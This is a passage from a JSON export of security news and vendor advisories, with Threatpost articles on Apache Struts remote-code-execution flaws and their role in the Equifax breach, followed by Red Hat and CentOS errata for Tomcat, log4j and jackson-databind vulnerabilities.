many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "modified": "2018-08-23T16:46:57", "published": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "modified": "2017-09-20T19:57:18", "published": "2017-09-11T15:02:31", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "bulletinFamily": "info", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "modified": "2017-09-05T18:44:40", "published": "2017-09-05T14:10:54", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "modified": "2017-09-15T13:01:13", "published": "2017-09-14T16:00:34", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:33", "bulletinFamily": "info", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes [a week after the company](<Smith's%20departure%20comes%20a%20week%20after%20the%20company%20announced%20its%20chief%20information%20officer%20David%20Webb%20and%20chief%20security%20officer%20Susan%20Mauldin,%20would%20be%20retiring.>) announced its chief information officer David Webb and chief security officer Susan Mauldin, would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "modified": "2017-09-26T14:28:26", "published": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:12", "bulletinFamily": "unix", "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es):\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)\n\n* A vulnerability was discovered in Tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application. (CVE-2017-5648)", "modified": "2018-04-12T03:33:10", "published": "2017-07-27T07:41:43", "id": "RHSA-2017:1809", "href": "https://access.redhat.com/errata/RHSA-2017:1809", "type": "redhat", "title": "(RHSA-2017:1809) Important: tomcat security update", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)\n\n* A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525.", "modified": "2017-09-05T18:47:00", "published": "2017-09-05T18:33:23", "id": "RHSA-2017:2637", "href": "https://access.redhat.com/errata/RHSA-2017:2637", "type": "redhat", "title": "(RHSA-2017:2637) Important: Red Hat JBoss Enterprise Application Platform 6.4.17 update on RHEL 5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:55", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)\n\n* A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525.", "modified": "2018-03-19T16:13:49", "published": "2017-09-05T18:32:51", "id": "RHSA-2017:2636", "href": "https://access.redhat.com/errata/RHSA-2017:2636", "type": "redhat", "title": "(RHSA-2017:2636) Important: Red Hat JBoss Enterprise Application Platform 6.4.17 update on RHEL 7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:31", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)\n\n* A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525.", "modified": "2018-06-07T02:39:09", "published": "2017-09-05T18:32:26", "id": "RHSA-2017:2635", "href": "https://access.redhat.com/errata/RHSA-2017:2635", "type": "redhat", "title": "(RHSA-2017:2635) Important: Red Hat JBoss Enterprise Application Platform 6.4.17 update on RHEL 6", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:29:02", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:1809\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es):\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)\n\n* A vulnerability was discovered in Tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and 